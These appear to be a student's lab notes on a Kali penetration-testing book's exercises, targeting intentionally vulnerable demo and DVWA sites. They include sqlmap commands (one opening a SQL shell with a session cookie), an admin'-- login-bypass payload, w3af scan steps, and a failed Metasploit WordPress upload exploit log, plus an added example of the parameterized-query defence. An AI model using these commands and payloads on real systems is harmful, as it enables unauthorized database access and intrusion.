p163 XSSF

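Kali 2.0 does not include XSSF by default, so download it first: https://code.google.com/archive/p/xssf/downloads

Unzip the downloaded zip file and merge its data, plugins, lab and other folders into the corresponding folders under /usr/share/metasploit-framework/; after that you can run load xssf in msfconsole.

I followed the book, but the final attack did not succeed!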

msf auxiliary(browser_autopwn) > xssf_exploit
[*] Searching Metasploit launched module with JobID = ''...
[+] A running exploit exists: 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !
[+] Remaining victims to attack: [[] ()] (it stops here and never moves on)
^C[-] Exploit interrupted by the console user

p180 Practice exercises

1. Probe www.testfire.net for SQL injection vulnerabilities:

root@kali:~# w3af_console
w3af>>> plugins
w3af/plugins>>> audit sqli
w3af/plugins>>> crawl web_spider
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://www.testfire.net/bank/login.aspx
w3af/config:target>>> back
The configuration has been saved.
w3af>>> plugins
w3af/plugins>>> output html_file
w3af/plugins>>> output config html_file
w3af/plugins/output/config:html_file>>> set verbose True
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back
w3af>>> start

The scan successfully found 8 URLs and 10 different injections points.

Scan it with sqlmap

sqlmap -u "http://www.testfire.net/bank/login.aspx" --data "uid=Admin&passw=a&btnSubmit=Login"

It detected some information about the back-end database


At http://www.testfire.net/bank/login.aspx, constructing the input   admin'--   logs in easily.

But how do I go further and get the information in the database? I haven't figured that out yet.
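Why the admin'-- input above gets past the login form, and the parameterized query that stops it, as an added example that is not from the original post or the book. The field names uid and passw come from the sqlmap --data string above; the table layout, the SQLite back end and the sample rows are assumptions, since the real site's schema is not shown on the page.

```python
import sqlite3


def make_db():
    """Build a constructed in-memory user table (sample data, not the real site's)."""
    db = sqlite3.connect(":memory:")
    # Plaintext passwords only keep the example focused on the query itself;
    # a real application stores a salted password hash instead.
    db.execute("CREATE TABLE users (uid TEXT PRIMARY KEY, passw TEXT NOT NULL)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "S3cret-constructed"), ("jsmith", "demo-constructed")],
    )
    return db


def build_vulnerable_sql(uid, passw):
    """Vulnerable pattern: form fields are pasted straight into the SQL text."""
    return (
        "SELECT uid FROM users WHERE uid = '" + uid
        + "' AND passw = '" + passw + "'"
    )


def login_vulnerable(db, uid, passw):
    """Return the matched user name, or None. Input can rewrite the statement."""
    row = db.execute(build_vulnerable_sql(uid, passw)).fetchone()
    return row[0] if row else None


def login_parameterized(db, uid, passw):
    """Hardened pattern: values are bound as data and never parsed as SQL."""
    row = db.execute(
        "SELECT uid FROM users WHERE uid = ? AND passw = ?", (uid, passw)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    uid, passw = "admin'--", "a"

    # The quote closes the string literal and "--" comments out the password
    # check, so the statement only tests uid = 'admin'.
    print("statement sent by the vulnerable code:")
    print("  " + build_vulnerable_sql(uid, passw))
    print("vulnerable login result:   ", login_vulnerable(db, uid, passw))

    # With bound parameters the whole string "admin'--" is compared against
    # the uid column, matches no row, and the login is refused.
    print("parameterized login result:", login_parameterized(db, uid, passw))
```

The same statement text is what a database query log would show for this request, so a WHERE clause that ends in a comment right after the user name is a useful thing to search for when reviewing logs.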

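2. Just follow p163 of the book

3. wXf download address:  https://github.com/forced-request/wXf

After downloading, unzip it, change into the extracted directory and run ./console, which prints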

/usr/lib/ruby/2.2./rubygems/core_ext/kernel_require.rb::in `require': cannot load such file -- iconv (LoadError)

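Since I am not very familiar with Ruby and could not really follow the fixes I found online, I am skipping this for now.

4. I chose this vulnerability to test:     https://www.exploit-db.com/exploits/37182/

However, the test result was: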

[CRITICAL] all tested parameters appear to be not injectable. 

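I don't know whether this is a matter of the version of the back-end server software.

5. I don't know how to do this one... skipping it for now

6. The following command successfully planted a SQL shell!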

sqlmap -u 'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'  --cookie='security=low; PHPSESSID=7918oeoatnur63rq8bokn88sd2' --sql-shell


7. p177

I followed the instructions step by step, but it did not succeed:

[*] Started reverse TCP handler on 10.10.10.128:
[*] Successfully uploaded shell.
[*] Trying to access shell at <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title> Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br />
does not allow request data with POST requests, or the amount of data provided in
the request exceeds the capacity limit.
</body></html>
...
[*] Exploit completed, but no session was created.
